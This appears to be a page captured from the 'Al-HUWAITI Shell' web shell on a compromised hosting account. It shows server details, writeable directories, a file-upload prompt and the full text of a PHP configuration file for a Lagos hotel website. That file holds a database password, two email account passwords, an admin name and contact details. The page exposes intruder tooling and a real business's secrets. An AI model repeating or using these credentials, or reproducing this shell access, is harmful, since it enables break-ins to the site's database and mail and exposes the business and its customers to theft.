Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/debutlers.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/debutlers.com/public_html/minks.php
<?php
date_default_timezone_set("Africa/Lagos");//TimeZone
//$servername = "localhost";$username = "root"; $password = "";$db = "soft";

$servername = "localhost"; $username = "u615232177_debutlers_ad"; $password = "O2i]6oISm"; $db = "u615232177_debutlers";

// Create connection
$con = mysqli_connect($servername, $username, $password,$db);
//$con = new mysqli("$servername", "$username", "$password", "$db");

// Check connection
if (!$con) {
    die("Connection failed: " . mysqli_connect_error());
}
$company_address="Lagos, Nigeria";
$company_address1="";
$company_phone = "0814 323 3478";
$company_phone1 = "";
$phone_number_whatsapp = "";
$company_name = "De Butlers";
$company_name1 = "";
$company_name2 = "";
$url="debutlers.com";
$company_email = "reservations@$url";
$reservations_email = "reservations@$url";
$no_reply_email ="noreply@$url";
$no_reply_password = "V:zEp2yC3!QZKN7";
$reservations_password = "Toluwalope@55";
$link ="https://www.$url";
$email_logo ="<img src='$link/assets/images/logo.png'>";
$email_logo_alone="$link/assets/images/logo.png";
$mint_green='#A2E4B8;';
$t_cr="#333";
$t_cr1="#8d65b4";
$color="cornflowerblue";
$currency="&#8358;";
$admin="admin5431";
$admin_no="admin5431";
$theme_color="#333";
include("https.php");

function calculatePercentageOfNumber($number, $percentage) {
    return ($number * $percentage) / 100;
}
?>

Al-HUWAITI Shell